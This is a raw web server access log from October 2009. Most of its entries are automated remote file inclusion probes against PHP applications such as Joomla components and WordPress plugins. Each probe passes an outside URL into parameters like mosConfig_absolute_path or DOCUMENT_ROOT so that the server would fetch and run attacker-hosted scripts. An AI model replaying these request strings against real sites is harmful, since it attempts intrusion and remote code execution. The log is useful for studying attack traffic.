209.97.212.185 - - [17/Oct/2009:04:10:20 -0400] "GET /logs/access_log.Q109092200//skins/advanced/advanced1.php?pluginpath[0]=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:10:48 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:10:48 -0400] "GET /logs/access_log.Q109063000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:10:50 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.27.203.107 - - [17/Oct/2009:04:11:01 -0400] "GET /logs/access_log.Q109052000//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
119.63.199.34 - - [17/Oct/2009:04:11:35 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
122.155.5.84 - - [17/Oct/2009:04:11:44 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:04:11:44 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
122.155.5.84 - - [17/Oct/2009:04:11:44 -0400] "GET /logs/error_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://keyza.fileave.com/set1.txt? HTTP/1.1" 404 286 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:11:48 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.133.148.98 - - [17/Oct/2009:04:12:08 -0400] "GET /logs/access_log.Q109053100//?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:12:09 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:12:09 -0400] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 200 22193 "-" "libwww-perl/5.814"
119.63.193.55 - - [17/Oct/2009:04:12:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
174.133.148.98 - - [17/Oct/2009:04:12:48 -0400] "GET /logs/access_log.Q109052800//?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.814"
121.124.127.164 - - [17/Oct/2009:04:12:52 -0400] "GET /logs/error_log.Q109071300//?path%5Bdocroot%5D=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:04:13:05 -0400] "GET /logs/access_log.Q109090300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:13:07 -0400] "GET /index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:13:07 -0400] "GET /logs/index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:13:07 -0400] "GET /index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:13:07 -0400] "GET /logs/index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:04:13:12 -0400] "GET //index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:04:13:12 -0400] "GET /logs//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.242.37.212 - - [17/Oct/2009:04:13:12 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.powervictory.org//data/nGagLiks/zfxid1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:13:34 -0400] "GET /index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:13:34 -0400] "GET /logs/index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:13:49 -0400] "GET //?_SERVER[DOCUMENT_ROOT]=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.814"
211.206.120.162 - - [17/Oct/2009:04:14:16 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:16 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:16 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:21 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:25 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:25 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:25 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:25 -0400] "GET //skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:25 -0400] "GET /logs/access_log.Q109092200%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:26 -0400] "GET /logs//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:30 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.206.120.162 - - [17/Oct/2009:04:14:31 -0400] "GET /logs/access_log.Q109060100%20%20//skins/advanced/advanced1.php?pluginpath[0]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.48.121.149 - - [17/Oct/2009:04:14:38 -0400] "GET /logs/access_log.Q109081800%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:15:53 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:15:53 -0400] "GET /appserv/main.php?appserv_root=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 214 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:15:53 -0400] "GET /logs/appserv/main.php?appserv_root=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:16:00 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 241 "-" "libwww-perl/5.814"
209.97.212.185 - - [17/Oct/2009:04:16:00 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:16:00 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:16:00 -0400] "GET /logs/access_log.Q109072900%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:16:04 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:16:04 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:16:04 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:08 -0400] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:08 -0400] "GET //skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:08 -0400] "GET /logs/access_log.Q109082300%20%20//skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:09 -0400] "GET //skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:09 -0400] "GET /logs//skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:09 -0400] "GET /logs/access_log.Q109082300%20%20//skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:16:21 -0400] "GET /index.php?abs_path=http://worldboii.webspacemania.com/avatars/x1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:16:21 -0400] "GET /logs/access_log.Q109073000/index.php?abs_path=http://worldboii.webspacemania.com/avatars/x1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
128.125.169.162 - - [17/Oct/2009:04:16:21 -0400] "GET /logs/index.php?abs_path=http://worldboii.webspacemania.com/avatars/x1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:31 -0400] "GET /logs//skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:31 -0400] "GET //skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:31 -0400] "GET /logs/access_log.Q109082300//skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:31 -0400] "GET //skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:31 -0400] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:31 -0400] "GET /logs/access_log.Q109082300//skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:16:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.95 - - [17/Oct/2009:04:16:49 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
203.229.58.122 - - [17/Oct/2009:04:16:57 -0400] "GET //skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:57 -0400] "GET //skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:57 -0400] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:57 -0400] "GET /logs/access_log.Q109082300//skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:57 -0400] "GET /logs//skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:57 -0400] "GET /logs/access_log.Q109082300//skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:16:58 -0400] "GET /logs/access_log.Q109092000%20%20//skin/uks_gallery_v3010/setup.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.229.58.122 - - [17/Oct/2009:04:17:00 -0400] "GET /logs/access_log.Q109092000%20%20//skin/uks_gallery_v3010/write.php?dir=http://luke.cuda71.com//Formmailer//modules/formmailer/idfx1.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
208.80.193.38 - - [17/Oct/2009:04:17:31 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; yie6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 2.8; ZangoToolbar 4.8.3)"
128.125.169.162 - - [17/Oct/2009:04:17:31 -0400] "GET /logs/access_log.Q109073000%20%20/index.php?abs_path=http://worldboii.webspacemania.com/avatars/x1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:17:46 -0400] "GET //e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:17:47 -0400] "GET /logs/error_log.Q109071800%20%20//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:17:47 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:17:47 -0400] "GET /logs/access_log.Q109090900%20%20//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:17:51 -0400] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:17:51 -0400] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.97.212.185 - - [17/Oct/2009:04:17:51 -0400] "GET /logs/access_log.Q109072900//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:18:06 -0400] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 208 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:18:06 -0400] "GET /logs/kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 213 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:18:06 -0400] "GET /logs/access_log.Q109070500/kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:18:07 -0400] "GET /logs/access_log.Q109051600/kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 235 "-" "libwww-perl/5.814"
121.124.127.164 - - [17/Oct/2009:04:18:12 -0400] "GET /logs/error_log.Q109071800%20%20//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:18:12 -0400] "GET /logs/access_log.Q109090900%20%20//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:18:12 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
121.124.127.164 - - [17/Oct/2009:04:18:12 -0400] "GET //e404.php?DOCUMENT_ROOT=http://yaeil.ac.kr/dboard/files//id1??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:06 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:06 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:06 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:10 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:33 -0400] "GET /e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:33 -0400] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:33 -0400] "GET /logs/access_log.Q109072900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
190.3.107.130 - - [17/Oct/2009:04:19:39 -0400] "GET /logs/access_log.Q109090900/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:21:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.23.2.21 - - [17/Oct/2009:04:21:55 -0400] "GET /logs/access_log.Q109090300/index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:21:58 -0400] "GET /logs/access_log.Q109090300/index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
94.23.2.21 - - [17/Oct/2009:04:22:02 -0400] "GET /logs/access_log.Q109090300/index.php?conteudo=http://fmmkor.org/zboard/data/mission/1.swf? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
123.125.66.78 - - [17/Oct/2009:04:22:10 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
66.249.71.152 - - [17/Oct/2009:04:23:00 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L015D51442609A800986806N+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.71.60.61 - - [17/Oct/2009:04:24:10 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 200 73909 "http://us.mg2.mail.yahoo.com/dc/launch?.gx=1&.rand=6qeptk379t8vm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)"
190.3.107.130 - - [17/Oct/2009:04:25:18 -0400] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.133.148.98 - - [17/Oct/2009:04:25:21 -0400] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 259 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:25:21 -0400] "GET /logs/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 264 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:25:21 -0400] "GET /logs/access_log.Q109090900/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.814"
174.133.148.98 - - [17/Oct/2009:04:25:21 -0400] "GET /logs/access_log.Q109082800/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 286 "-" "libwww-perl/5.814"
218.219.198.195 - - [17/Oct/2009:04:25:33 -0400] "GET /logs/error_log.Q109062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
218.219.198.195 - - [17/Oct/2009:04:25:33 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 249 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
190.3.107.130 - - [17/Oct/2009:04:25:47 -0400] "GET /logs/access_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://www.fileden.com/files/2009/9/19/2579345/fx29id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [17/Oct/2009:04:26:49 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.219.198.195 - - [17/Oct/2009:04:26:53 -0400] "GET /logs/error_log.Q109062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.219.198.195 - - [17/Oct/2009:04:26:54 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
218.219.198.195 - - [17/Oct/2009:04:26:54 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
218.219.198.195 - - [17/Oct/2009:04:27:00 -0400] "GET /logs/access_log.Q109062400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.ownzz.netai.net/idzim?? HTTP/1.1" 404 276 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
174.133.148.98 - - [17/Oct/2009:04:27:24 -0400] "GET /logs/access_log.Q109090900%20/administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://n34.biz/.injek/kontol.txt???? HTTP/1.1" 404 287 "-" "libwww-perl/5.814"
93.190.49.3 - - [17/Oct/2009:04:27:33 -0400] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:27:33 -0400] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:27:33 -0400] "GET /logs/access_log.Q109051600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
93.190.49.3 - - [17/Oct/2009:04:27:34 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://mail.metalwrks.com/shar/id1?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
